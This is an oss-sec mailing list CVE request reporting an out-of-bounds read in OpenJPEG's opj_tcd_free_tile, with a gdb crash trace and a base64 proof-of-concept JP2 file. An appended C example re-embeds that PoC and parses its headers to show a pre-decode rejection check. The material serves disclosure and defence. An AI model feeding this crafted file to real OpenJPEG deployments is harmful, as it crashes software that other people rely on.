oss-sec mailing list archives
CVE request - OpenJPEG : Out-Of-Bounds Read in opj_tcd_free_tile function
From: winsonliu(刘科) <winsonliu () tencent com>
Date: Mon, 14 Mar 2016 06:51:56 +0000
Hi all,

I found a vulnerability in OpenJPEG. The specific flaw exists within the opj_tcd_free_tile function. A specially crafted JPEG2000 image file can force an out-of-bounds read to occur in OpenJPEG. This issue can be reproduced with the latest version of OpenJPEG (https://github.com/uclouvain/openjpeg, 2016.03.14). The details of this issue are as follows.

---------------------------------
winson@ubuntu:~/Desktop/repo/openjpeg/bin$ gdb opj_decompress -q
Reading symbols from opj_decompress...(no debugging symbols found)...done.
(gdb) r -o image.pgm -i opj_tcd_free_tile.jp2
Starting program: /home/winson/Desktop/repo/openjpeg/bin/opj_decompress -o image.pgm -i oob_opj_tcd_free_tile.jp2
[INFO] Start to read j2k main header (131).
[INFO] Main header has been correctly decoded.
[INFO] No decoded area parameters, set the decoded area to the whole image
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[INFO] Header of tile 1 / 1 has been read.
[INFO] Tile 1/1 has been decoded.
[INFO] Image data has been updated with tile 1.
[INFO] Stream reached its end !
/home/winson/Desktop/repo/openjpeg/src/bin/jp2/convert.c:1765:imagetopnm precision 31 is larger than 16 : refused.
[ERROR] Outfile image.pgm not generated

Program received signal SIGSEGV, Segmentation fault.
0xb7fc61ae in opj_tcd_free_tile () from /home/winson/Desktop/repo/openjpeg/bin/libopenjp2.so.7
(gdb) bt
#0  0xb7fc61ae in opj_tcd_free_tile () from /home/winson/Desktop/repo/openjpeg/bin/libopenjp2.so.7
#1  0xb7fc3ffa in opj_tcd_destroy () from /home/winson/Desktop/repo/openjpeg/bin/libopenjp2.so.7
#2  0xb7fa6cea in opj_j2k_destroy () from /home/winson/Desktop/repo/openjpeg/bin/libopenjp2.so.7
#3  0xb7fb4b38 in opj_jp2_destroy () from /home/winson/Desktop/repo/openjpeg/bin/libopenjp2.so.7
#4  0xb7fb74ac in opj_destroy_codec () from /home/winson/Desktop/repo/openjpeg/bin/libopenjp2.so.7
#5  0x0804ca82 in main ()
(gdb) x /i $eip
=> 0xb7fc61ae <opj_tcd_free_tile+288>:	mov    0x20(%eax),%eax
(gdb) i r
eax            0x40f72d11	1089940753
ecx            0x30	48
edx            0x362e88c5	909019333
ebx            0xb7fd6000	-1208131584
esp            0xbfff9e80	0xbfff9e80
ebp            0xbfff9ec8	0xbfff9ec8
esi            0x0	0
edi            0x0	0
eip            0xb7fc61ae	0xb7fc61ae <opj_tcd_free_tile+288>
eflags         0x10293	[ CF AF SF IF RF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
(gdb) x /40xb $eax
0x40f72d11:	Cannot access memory at address 0x40f72d11
(gdb) x /40xb $eax-0x20
0x40f72cf1:	Cannot access memory at address 0x40f72cf1

The attachment is the proof-of-concept file. Alternatively, you can decode the following string using base64 and save the decoded content to a .jp2 file.
---------------------------------
AAAADGpQICANCocKAAAAFGZ0eXBqcDIgAAAAAGpwMiAAAABbanAyaAAAABZpaGRyAAAAIAAAACAA
BP8HAAAAAAAMYnBjYwQEBAAAAAAPY29scgEAAAAAABgAAAAiY2RlZgAEAAAAAAACAAEAAAADAAIA
AAADAAMAAQAAAAABI2pwMmP/T/9RADIAAAAAACAAAAAgAAAAAAAAAAAAAAAgAAAAIAAAAAAAAAAA
AAQECxWeAQEEAQEAAQH/UgAMAAAAAQEFBAQAAf9cABNAKDAwODAwODAwODAwODAwOP9kACUAAUNy
ZWF0ZWQgYnkgT3BlbkpQRUcgdmVyc2lvbiAyLjEuMP+QAAoAAAAAAJkAAf+TwQgDz4AQCcOBA4Ch
8AIEp8YIBr+vpBAJ18hAA6PjCAOXpU+vpCALHlIPoeDACzrXgKPkCgDP1Tx/p84cA3/dRtwif6fO
HAN/3VDyfH+AofCKPmKiqS6j5BI9pjRZ2Z4Nooaj4xA9pjRZ2Z4Nv4Cg6MCdlqj4G1+h8I6drClA
9VfWofCMnawpQPlngP/Z

CREDIT: This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.
Attachment:
oob_opj_tcd_free_tile.jp2
Description: oob_opj_tcd_free_tile.jp2
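The log in the report shows convert.c refusing a 31-bit component only after the whole tile had already been decoded, with the crash following in teardown. As an added example (not code from the post and not OpenJPEG's own code), the C program below decodes the base64 PoC from the post, walks the JP2 box structure, reads the ihdr/bpcc boxes and the codestream SIZ marker, and reports what a decoder front end could refuse before allocating or decoding anything: a component precision above 16 (the limit imagetopnm enforces in the log) and a bit depth that disagrees between the JP2 header and the codestream. The box and marker layout follows ISO/IEC 15444-1; the 16-component cap, the jp2_info struct, the function names and the bounds checks are this example's own choices. On the PoC it reports a 32x32 image with four components whose bpcc depths are 5, 5, 5 and 1 bits, while the SIZ marker declares component 1 as 31-bit signed and component 0 with 11x21 subsampling.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Base64 of oob_opj_tcd_free_tile.jp2, copied from the post above (decodes to 414 bytes). */
static const char poc_b64[] =
    "AAAADGpQICANCocKAAAAFGZ0eXBqcDIgAAAAAGpwMiAAAABbanAyaAAAABZpaGRyAAAAIAAAACAA"
    "BP8HAAAAAAAMYnBjYwQEBAAAAAAPY29scgEAAAAAABgAAAAiY2RlZgAEAAAAAAACAAEAAAADAAIA"
    "AAADAAMAAQAAAAABI2pwMmP/T/9RADIAAAAAACAAAAAgAAAAAAAAAAAAAAAgAAAAIAAAAAAAAAAA"
    "AAQECxWeAQEEAQEAAQH/UgAMAAAAAQEFBAQAAf9cABNAKDAwODAwODAwODAwODAwOP9kACUAAUNy"
    "ZWF0ZWQgYnkgT3BlbkpQRUcgdmVyc2lvbiAyLjEuMP+QAAoAAAAAAJkAAf+TwQgDz4AQCcOBA4Ch"
    "8AIEp8YIBr+vpBAJ18hAA6PjCAOXpU+vpCALHlIPoeDACzrXgKPkCgDP1Tx/p84cA3/dRtwif6fO"
    "HAN/3VDyfH+AofCKPmKiqS6j5BI9pjRZ2Z4Nooaj4xA9pjRZ2Z4Nv4Cg6MCdlqj4G1+h8I6drClA"
    "9VfWofCMnawpQPlngP/Z";

static int b64val(int c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    return c == '+' ? 62 : c == '/' ? 63 : -1;      /* '=' padding and whitespace are skipped */
}

static size_t b64_decode(const char *s, uint8_t *out, size_t cap)
{
    size_t n = 0; unsigned acc = 0; int bits = 0;
    for (; *s; s++) {
        int v = b64val((unsigned char)*s);
        if (v < 0) continue;
        acc = (acc << 6) | (unsigned)v; bits += 6;
        if (bits >= 8) { bits -= 8; if (n < cap) out[n++] = (uint8_t)(acc >> bits); acc &= (1u << bits) - 1; }
    }
    return n;
}

static uint32_t rd32(const uint8_t *p) { return (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | p[2] << 8 | p[3]; }
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] << 8 | p[1]); }

struct comp { int prec, sgnd, dx, dy, jp2h_prec; };   /* jp2h_prec: depth from ihdr/bpcc, -1 if absent */
struct jp2_info { uint32_t w, h; int ncomp, bad_prec, mismatch; struct comp c[16]; };

/* Find the first box of the given type in [p, end). Rejects box lengths that overrun the buffer. */
static const uint8_t *find_box(const uint8_t *p, const uint8_t *end, const char *type, size_t *len)
{
    while (end - p >= 8) {
        uint32_t lbox = rd32(p);
        if (lbox == 0) lbox = (uint32_t)(end - p);                               /* box runs to end of data */
        if (lbox == 1 || lbox < 8 || lbox > (uint32_t)(end - p)) return NULL;    /* XLBox unsupported, bad length */
        if (memcmp(p + 4, type, 4) == 0) { *len = lbox - 8; return p + 8; }
        p += lbox;
    }
    return NULL;
}

/* Parse ihdr/bpcc and the codestream SIZ marker. Returns 0 if well formed, -1 otherwise;
 * bad_prec / mismatch flag input that a converter should refuse before decoding. */
static int inspect_jp2(const uint8_t *buf, size_t n, struct jp2_info *info)
{
    const uint8_t *end = buf + n, *p, *jp2h, *bpcc, *cs, *siz;
    size_t len, hlen, blen = 0;
    memset(info, 0, sizeof *info);
    if (n < 12 || memcmp(buf + 4, "jP  ", 4) != 0) return -1;                   /* signature box */
    if (!(jp2h = find_box(buf, end, "jp2h", &hlen))) return -1;
    if (!(p = find_box(jp2h, jp2h + hlen, "ihdr", &len)) || len < 14) return -1;
    info->h = rd32(p); info->w = rd32(p + 4);
    int nc = rd16(p + 8), bpc = p[10];                                           /* BPC 0xFF: depths are in bpcc */
    if (nc < 1 || nc > 16) return -1;
    bpcc = find_box(jp2h, jp2h + hlen, "bpcc", &blen);
    for (int i = 0; i < 16; i++) {
        int v = i >= nc ? -1 : bpc != 0xFF ? bpc : (bpcc && (size_t)i < blen) ? bpcc[i] : -1;
        info->c[i].jp2h_prec = v < 0 ? -1 : (v & 0x7F) + 1;
    }
    if (!(cs = find_box(buf, end, "jp2c", &len)) || len < 42) return -1;
    if (rd16(cs) != 0xFF4F || rd16(cs + 2) != 0xFF51) return -1;                /* SOC must be followed by SIZ */
    siz = cs + 4;
    int lsiz = rd16(siz), csiz = rd16(siz + 36);
    if (csiz < 1 || csiz > 16 || lsiz != 38 + 3 * csiz || (size_t)lsiz + 4 > len) return -1;
    info->ncomp = csiz;
    if (csiz != nc) info->mismatch = 1;
    for (int i = 0; i < csiz; i++) {
        const uint8_t *q = siz + 38 + 3 * i;                                     /* Ssiz, XRsiz, YRsiz */
        struct comp *c = &info->c[i];
        c->prec = (q[0] & 0x7F) + 1; c->sgnd = q[0] >> 7; c->dx = q[1]; c->dy = q[2];
        if (c->dx == 0 || c->dy == 0) return -1;                                /* XRsiz/YRsiz must be 1..255 */
        if (c->prec > 16) info->bad_prec = 1;                                    /* the limit imagetopnm enforces */
        if (c->jp2h_prec != -1 && c->jp2h_prec != c->prec) info->mismatch = 1;
    }
    return 0;
}

/* Decode the embedded PoC and inspect it. */
static int poc_inspect(struct jp2_info *info)
{
    uint8_t buf[512];
    return inspect_jp2(buf, b64_decode(poc_b64, buf, sizeof buf), info);
}

int main(void)
{
    struct jp2_info info;
    if (poc_inspect(&info) != 0) { puts("malformed JP2"); return 1; }
    printf("%ux%u, %d components\n", (unsigned)info.w, (unsigned)info.h, info.ncomp);
    for (int i = 0; i < info.ncomp; i++)
        printf("  comp %d: SIZ %2d-bit %s, subsampling %dx%d, jp2h depth %d\n", i, info.c[i].prec,
               info.c[i].sgnd ? "signed  " : "unsigned", info.c[i].dx, info.c[i].dy, info.c[i].jp2h_prec);
    if (info.bad_prec || info.mismatch) puts("REJECT before decoding: precision > 16 or header/codestream mismatch");
    return 0;
}
```

The point of checking both places is that a converter which trusts the JP2 header alone sees four components of 5, 5, 5 and 1 bits and only learns about the 31-bit component from the codestream once decoding is under way. Refusing the file when the two disagree, or when any Ssiz exceeds the output format's limit, moves the rejection ahead of tile allocation.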
Current thread:
- CVE request - OpenJPEG : Out-Of-Bounds Read in opj_tcd_free_tile function 刘科 (Mar 14)
- Re: CVE request - OpenJPEG : Out-Of-Bounds Read in opj_tcd_free_tile function cve-assign (Mar 16)